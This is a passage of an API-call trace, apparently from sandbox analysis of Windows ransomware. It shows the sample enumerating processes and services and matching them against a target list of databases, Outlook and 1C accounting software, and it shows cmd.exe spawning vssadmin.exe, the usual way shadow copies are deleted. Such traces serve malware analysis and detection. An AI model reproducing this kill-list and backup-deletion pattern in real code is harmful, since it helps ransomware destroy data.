	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0047.834] lstrlenW (lpString="WdiServiceHost") returned 14
	[0047.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0047.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0047.834] lstrlenW (lpString="WdiSystemHost") returned 13
	[0047.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0047.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0047.834] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0047.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0047.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0047.834] lstrlenW (lpString="Winmgmt") returned 7
	[0047.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0047.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0047.834] lstrlenW (lpString="WPDBusEnum") returned 10
	[0047.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0047.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0047.834] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0047.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0047.834] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0047.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0
	[0047.837] Process32FirstW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0047.837] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0047.837] lstrlenW (lpString="System") returned 6
	[0047.837] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0047.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0047.838] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0047.838] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0047.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0047.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0047.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0047.838] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0047.838] lstrlenW (lpString="smss.exe") returned 8
	[0047.838] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0047.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0047.838] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0047.839] lstrlenW (lpString="csrss.exe") returned 9
	[0047.839] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0047.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0047.839] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0047.839] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0047.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0047.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0047.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0047.839] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0047.840] lstrlenW (lpString="wininit.exe") returned 11
	[0047.840] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0047.840] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0047.840] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0047.840] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0047.840] lstrlenW (lpString="csrss.exe") returned 9
	[0047.840] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0047.841] lstrlenW (lpString="winlogon.exe") returned 12
	[0047.841] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0047.841] lstrlenW (lpString="services.exe") returned 12
	[0047.841] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0047.842] lstrlenW (lpString="lsass.exe") returned 9
	[0047.842] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0047.842] lstrlenW (lpString="lsm.exe") returned 7
	[0047.842] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.843] lstrlenW (lpString="svchost.exe") returned 11
	[0047.843] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.843] lstrlenW (lpString="svchost.exe") returned 11
	[0047.843] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.844] lstrlenW (lpString="svchost.exe") returned 11
	[0047.844] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.844] lstrlenW (lpString="svchost.exe") returned 11
	[0047.844] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.844] lstrlenW (lpString="svchost.exe") returned 11
	[0047.845] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0047.845] lstrlenW (lpString="audiodg.exe") returned 11
	[0047.845] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.845] lstrlenW (lpString="svchost.exe") returned 11
	[0047.845] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.846] lstrlenW (lpString="svchost.exe") returned 11
	[0047.846] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0047.846] lstrlenW (lpString="dwm.exe") returned 7
	[0047.846] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0047.847] lstrlenW (lpString="explorer.exe") returned 12
	[0047.847] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0047.847] lstrlenW (lpString="spoolsv.exe") returned 11
	[0047.847] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0047.848] lstrlenW (lpString="taskhost.exe") returned 12
	[0047.848] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0047.848] lstrlenW (lpString="svchost.exe") returned 11
	[0047.848] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0047.849] lstrlenW (lpString="taskeng.exe") returned 11
	[0047.849] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0047.849] lstrlenW (lpString="taskhost.exe") returned 12
	[0047.849] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0047.850] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0047.850] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0047.850] lstrlenW (lpString="python tragedy.exe") returned 18
	[0047.850] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0047.851] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0047.851] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0047.851] lstrlenW (lpString="computers.exe") returned 13
	[0047.851] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0047.852] lstrlenW (lpString="separated.exe") returned 13
	[0047.852] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0047.852] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0047.852] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0047.853] lstrlenW (lpString="darkness.exe") returned 12
	[0047.853] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0047.853] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0047.853] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0047.854] lstrlenW (lpString="sophisticated.exe") returned 17
	[0047.854] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0047.854] lstrlenW (lpString="wishlist.exe") returned 12
	[0047.854] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0047.855] lstrlenW (lpString="top.exe") returned 7
	[0047.855] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0047.855] lstrlenW (lpString="implemented.exe") returned 15
	[0047.855] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0047.856] lstrlenW (lpString="comp.exe") returned 8
	[0047.856] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0047.856] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0047.856] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0047.857] lstrlenW (lpString="solved.exe") returned 10
	[0047.857] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0047.857] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0047.857] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0047.858] lstrlenW (lpString="trips.exe") returned 9
	[0047.858] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0047.858] lstrlenW (lpString="tumormanual.exe") returned 15
	[0047.858] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0047.859] lstrlenW (lpString="telecom.exe") returned 11
	[0047.859] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0047.859] lstrlenW (lpString="realistic.exe") returned 13
	[0047.859] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0047.860] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0047.860] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0047.860] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0047.860] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0047.980] lstrlenW (lpString="cmd.exe") returned 7
	[0047.982] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0047.999] lstrlenW (lpString="conhost.exe") returned 11
	[0048.009] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0048.018] lstrlenW (lpString="vssadmin.exe") returned 12
	[0048.022] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0048.022] lstrlenW (lpString="VSSVC.exe") returned 9
	[0048.022] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.023] lstrlenW (lpString="svchost.exe") returned 11
	[0048.023] Process32NextW (in: hSnapshot=0x1d0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0048.023] CloseHandle (hObject=0x1d0) returned 1
	[0048.023] Sleep (dwMilliseconds=0x1f4) 
	[0048.650] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fcc0
	[0048.651] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0048.651] GetLastError () returned 0xea
	[0048.651] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0048.651] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0048.652] CloseServiceHandle (hSCObject=0x7e0fcc0) returned 1
	[0048.652] lstrlenW (lpString="Appinfo") returned 7
	[0048.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0048.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0048.652] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0048.652] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0048.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0048.652] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0048.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0048.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
